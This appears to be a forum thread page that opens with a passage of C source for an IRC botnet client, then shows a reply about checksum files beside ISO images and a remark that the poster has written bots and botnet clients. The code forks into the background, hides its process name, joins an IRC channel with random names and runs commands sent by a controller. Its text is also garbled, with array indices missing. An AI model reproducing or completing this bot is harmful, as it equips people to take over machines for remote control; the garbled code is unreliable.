    out=fopen(str,"a");
    if (out != NULL) {
    fputs(outfile,out);
    fclose(out);
    }
    }
    else fclose(file);
    }
    else fclose(file);
    }
    #endif
    if (fork()) exit(0);
    #ifdef FAKENAME
    strncpy(argv[0],FAKENAME,strlen(argv[0]));
    for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
    #endif
    srand((time(NULL) ^ getpid()) + getppid());
    nick=makestring();
    ident=makestring();
    user=makestring();
    chan=CHAN;
    key=KEY;
    server=NULL;
    sa:
    #ifdef IDENT
    for (i=0;i<numpids;i++) {
    if (pids != 0 && pids != getpid()) {
    kill(pids,9);
    waitpid(pids,NULL,WNOHANG);
    }
    }
    pids=NULL;
    numpids=0;
    identd();
    #endif
    con();
    Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
    while(1) {
    unsigned long i;
    fd_set n;
    struct timeval tv;
    FD_ZERO(&n);
    FD_SET(sock,&n);
    tv.tv_sec=60*20;
    tv.tv_usec=0;
    if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
    for (i=0;i<numpids;i++) if (waitpid(pids,NULL,WNOHANG) > 0) {
    unsigned int *newpids,on;
    for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
    pids[on-1]=0;
    numpids--;
    newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
    for (on=0;on<numpids;on++) newpids[on]=pids[on];
    free(pids);
    pids=newpids;
    }
    if (FD_ISSET(sock,&n)) {
    char buf[4096], *str;
    int i;
    if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
    buf=0;
    str=strtok(buf,"\n");
    while(str && *str) {
    char name[1024], sender[1024];
    filter(str);
    if (*str == ':') {
    for (i=0;i<strlen(str) && str != ' ';i++);
    str=0;
    strcpy(sender,str+1);
    strcpy(str,str+i+1);
    }
    else strcpy(sender,"*");
    for (i=0;i<strlen(str) && str != ' ';i++);
    str=0;
    strcpy(name,str);
    strcpy(str,str+i+1);
    for (i=0;msgs.cmd != (char *)0;i++) if (!strcasecmp(msgs.cmd,name)) msgs.func(sock,sender,str);
    if (!strcasecmp(name,"ERROR")) goto sa;
    str=strtok((char*)NULL,"\n");
    }
    }
    }
    return 0;
    }


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    bedlam wrote: »
    That seems needlessly complicated, just gpg sign either the ISO file or the file containing the hashes of the ISO.

    Your way is better, but either way, having a flat plaintext file with the hashes in it next to the ISO is daft, right? At least it is, if you check the checksums for security reasons.

    I've written IRC bots in Perl and a botnet client in Python. Its interesting to read the code of one in C.


Advertisement